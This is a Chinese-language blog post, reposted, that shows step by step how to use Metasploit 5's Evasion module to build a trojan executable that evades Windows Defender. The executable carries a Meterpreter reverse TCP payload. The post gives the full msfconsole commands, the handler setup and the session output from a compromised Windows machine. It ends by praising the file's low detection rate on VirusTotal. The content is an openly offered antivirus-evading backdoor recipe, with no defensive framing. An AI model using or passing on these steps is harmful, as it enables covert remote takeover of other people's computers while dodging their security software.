博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
使用metasploit中Evasion模块
阅读量:6139 次
发布时间:2019-06-21

本文共 2919 字,大约阅读时间需要 9 分钟。

简介

几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试

操作

首先打开metasploit

msfconsole

你会看到下面这个界面

~ msfconsoleThis copy of metasploit-framework is more than two weeks old. Consider running 'msfupdate' to update to the latest version.      .:okOOOkdc'           'cdkOOOko:.    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.         ,kOl'M.OOOOOOOOOOOOO.M'dOk,           :kk;.OOOOOOOOOOOOO.;Ok:             ;kOOOOOOOOOOOOOOOk:               ,xOOOOOOOOOOOx,                 .lOOOOOOOl.                    ,dOd,                      .       =[ metasploit v5.0.2-dev-c808cbe0509d4e8819879c6e1ed8bda45c34a19f]+ -- --=[ 1851 exploits - 1046 auxiliary - 321 post       ]+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]+ -- --=[ 2 evasion                                       ]+ -- --=[ ** This is Metasploit 5 development branch **   ]

之后使用evasion模块,首先看看有什么evasion模块

msf5 > show evasionevasion=======   Name                             Disclosure Date  Rank    Check  Description   ----                             ---------------  ----    -----  -----------   windows/windows_defender_exe                      normal  No     Microsoft Windows Defender Evasive Executable   windows/windows_defender_js_hta                   normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

使用windows/windows_defender_exe这个模块

use windows/windows_defender_exe

查看要配置的参数

show options

msf5 evasion(windows/windows_defender_exe) > show optionsModule options (evasion/windows/windows_defender_exe):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   FILENAME  oDlIipoP.exe     yes       Filename for the evasive file (default: random)Evasion target:   Id  Name   --  ----   0   Microsoft Windows

就一个文件名参数可以配置

set FILENAME bboysoul.exe

之后使用reverse_tcp payload

set payload windows/meterpreter/reverse_tcp

设置端口和ip

set LHOST 10.10.10.186

set LPORT 4444

生成木马文件

exploit

之后打开一个监听端口

use multi/handler

设置payload

set payload windows/meterpreter/reverse_tcp

设置主机和端口

set LHOST 10.10.10.186

set LPORT 4444

执行

exploit

接着我们把生成出来的木马在远端要被控制的windows机器上运行我们这里就可以接收到这个回话了

msf5 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 10.10.10.186:4444^@[*] Sending stage (179779 bytes) to 10.10.10.167[*] Meterpreter session 1 opened (10.10.10.186:4444 -> 10.10.10.167:52882) at 2019-02-23 13:37:14 +0800

上面都是常规操作,之后我们扫描病毒

打开

www.virustotal.com

放入文件扫描

只有33个病毒引擎扫描出来了,说明还可以

欢迎关注Bboysoul的博客

Have Fun

转载地址:http://souya.baihongyu.com/

你可能感兴趣的文章
焊盘 往同一个方向增加 固定的长度方法 总结
查看>>
eclipse的maven、Scala环境搭建
查看>>
架构师之路(一)- 什么是软件架构
查看>>
jquery的冒泡和默认行为
查看>>
USACO 土地购买
查看>>
【原创】远景能源面试--一面
查看>>
B1010.一元多项式求导(25)
查看>>
10、程序员和编译器之间的关系
查看>>
前端学习之正则表达式
查看>>
配置 RAILS FOR JRUBY1.7.4
查看>>
AndroidStudio中导入SlidingMenu报错解决方案
查看>>
修改GRUB2背景图片
查看>>
Ajax异步
查看>>
好记性不如烂笔杆-android学习笔记<十六> switcher和gallery
查看>>
JAVA GC
查看>>
codeforce 599B Spongebob and Joke
查看>>
3springboot:springboot配置文件(外部配置加载顺序、自动配置原理,@Conditional)
查看>>
9、Dubbo-配置(4)
查看>>
前端第七天
查看>>
图解SSH原理及两种登录方法
查看>>